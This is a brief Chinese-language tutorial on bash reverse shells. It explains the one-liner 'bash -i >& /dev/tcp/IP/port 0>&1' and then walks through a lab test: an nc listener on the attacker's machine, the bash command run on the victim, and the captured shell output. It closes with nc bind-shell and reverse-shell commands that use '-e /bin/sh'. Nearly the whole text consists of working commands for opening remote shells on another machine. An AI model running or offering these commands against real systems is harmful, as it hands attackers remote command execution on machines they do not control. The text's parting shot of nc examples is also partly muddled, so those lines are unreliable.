一、介紹
bash反射就是反彈一個交互的shell,類似ssh連接,可以執行命令
二、使用命令
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i 是打開一個交互的bash
>& 是將標准錯誤輸出定向到標准輸出中。
/dev/tcp/ 是Linux中的一個特殊設備,打開這個文件就相當於發出了一個socket調用,建立一個socket連接,讀寫這個文件就相當於在這個socket連接中傳輸數據。同理,Linux中還存在/dev/udp/。
0>&1 是將標准輸入重定向到標准輸出中。
三、實戰測試
攻擊端
##安裝nc yum install nc -y #使用nc打開一個端口(我這使用80) [root@server ~]# nc -v -l -p 80 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80
被攻擊端
[root@localhost~]#/bin/bash -i >& /dev/tcp/10.0.0.1/80 0>&1
查看攻擊端
[root@server ~]# nc -v -l -p 80 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from 10.0.0.141. Ncat: Connection from 10.0.0.141:56507. [root@localhost~]# //變成了被攻擊端的界面 #執行命令測試 [root@localhost~]#pwd pwd /root [root@localhost~]#hostname hostname localhost.localdomain [root@localhost~]#ll /^H
nc正向連接
被攻擊端: nc -lvp 8080 -e /bin/sh 攻擊端: nc -nvl 10.0.0.138 8080
nc反向連接
攻擊端:nc 10.0.0.138 8080 被攻擊端: nc -vv 10.0.0.132 8080 -e /bin/sh